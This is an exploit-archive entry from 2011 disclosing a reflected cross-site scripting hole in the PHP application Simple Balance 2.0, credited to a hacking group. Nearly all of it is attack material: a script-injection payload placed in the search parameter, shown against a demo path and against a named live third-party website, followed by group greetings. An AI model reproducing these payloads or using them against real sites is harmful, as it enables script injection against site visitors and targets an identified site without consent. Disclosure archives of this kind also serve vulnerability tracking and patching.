Simple Balance 2.0 Cross Site Scripting

2011-10-28T00:00:00
ID PACKETSTORM:106341
Type packetstorm
Reporter Mr.PaPaRoSSe
Modified 2011-10-28T00:00:00

Description

                                        
                                            `  
# Exploit Title: Simple Balance 2.0 XSS  
# Date: 28.10.2011 - 20.44  
# Author: Mr.PaPaRoSSe  
# Tested On: BackTrack 5 - Win7  
# Platform: Php  
  
-------------------------------------------------------------  
  
http://demo/tags/?s=XSS  
  
<script>alert("DDz Mr.PaPaRoSSe")</script>  
  
http://www.jennyandians.com/?s=<script>alert("DDz Mr.PaPaRoSSe")</script>  
  
-------------------------------------------------------------  
Contact: paparosse.blogspot.com  
Greetz: Http://DarkDevilz.in/  
-------------------------------------------------------------  
  
3spi0n - ALEXTRAX - sanTiq0   
Deathless - ZyX - Tarxes  
53rh4+ - bLaCk_uMo - PeRs   
syntaX - Mavi_Karalik - DarkCOD3R  
x-Leader - Cyborg - Y2J  
  
[And DD'z Family]  
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY]  
  
  
`